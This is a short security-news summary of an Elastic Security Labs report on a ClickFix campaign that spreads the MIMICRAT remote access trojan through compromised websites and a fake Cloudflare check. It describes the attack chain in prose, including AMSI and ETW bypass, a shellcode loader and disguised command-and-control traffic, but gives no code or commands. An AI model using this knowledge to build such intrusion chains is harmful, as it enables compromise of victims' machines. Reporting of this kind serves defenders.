"The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic," Elastic Security Labs said in a Friday report."
"In the infection sequence highlighted by Elastic, the entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript code that's responsible for loading an externally hosted PHP script. The PHP script then proceeds to deliver the ClickFix lure by displaying a fake Cloudflare verification page and instructing the victim to copy and paste a command into the Windows Run dialog to address the issue."
A ClickFix campaign abuses compromised legitimate websites to deliver a previously undocumented remote access trojan called MIMICRAT (aka AstarionRAT). The attack uses a multi-stage PowerShell chain that patches ETW and AMSI, drops a Lua-scripted shellcode loader, and installs a C++ RAT with Windows token impersonation, SOCKS5 tunneling, and 22 post-exploitation commands. Final command-and-control traffic uses HTTPS on port 443 with HTTP profiles mimicking web analytics. Initial compromise can involve injecting malicious JavaScript into BIN validation services to load an external PHP lure that shows a fake Cloudflare verification page and tricks users into running PowerShell. The campaign shows overlaps with Matanbuchus 3.0 loader activity and likely targets ransomware deployment or data exfiltration.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]